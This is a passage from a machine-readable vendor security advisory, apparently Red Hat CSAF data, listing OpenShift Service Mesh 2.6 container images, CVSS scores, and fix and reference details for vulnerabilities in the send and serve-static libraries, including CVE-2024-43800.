"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "rhdh-hub-container 1.2 and 1.3 have included patches for this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
